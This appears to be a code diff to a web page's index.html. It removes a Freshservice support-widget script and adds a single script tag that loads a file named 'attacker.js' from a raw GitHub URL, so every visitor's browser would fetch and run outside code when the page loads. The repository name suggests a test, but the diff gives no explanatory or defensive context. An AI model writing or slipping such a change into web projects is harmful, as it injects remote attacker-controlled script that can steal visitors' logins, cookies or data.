--- a/index.html
+++ b/index.html
@@ -1,4 +1,1 @@
-<script type="text/javascript" src="https://assets.freshservice.com/widget/freshwidget.js"></script>
-<script type="text/javascript">
-	FreshWidget.init("", {"queryString": "&widgetType=popup", "utf8": "✓", "widgetType": "popup", "buttonType": "text", "buttonText": "Support", "buttonColor": "black", "buttonBg": "#12344d", "alignment": "2", "offset": "235px", "formHeight": "500px", "url": "https://help1.freshservice.com"} );
-</script>
+<script type="text/javascript" src="https://raw.githubusercontent.com/sathyatesting001/web/main/attacker.js"></script>
